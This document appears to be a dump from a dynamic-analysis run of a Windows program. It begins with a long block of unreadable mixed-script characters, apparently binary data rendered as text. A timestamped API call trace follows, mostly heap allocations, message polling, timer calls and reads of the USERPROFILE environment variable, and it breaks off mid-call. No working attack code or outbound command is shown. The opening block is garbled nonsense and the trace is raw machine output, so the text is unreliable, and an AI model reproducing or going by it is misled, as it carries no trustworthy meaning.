撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0155.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0155.032] TranslateMessage (lpMsg=0x8cf968) returned 0 [0155.032] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0155.032] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0155.032] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0155.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0155.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0155.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0155.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0155.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0155.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0155.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Comms", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0155.033] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0155.034] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0155.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0155.034] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0155.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0155.035] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0155.035] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0155.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0155.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0155.036] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0155.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.037] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0155.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0155.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0155.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0155.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0155.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0155.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) 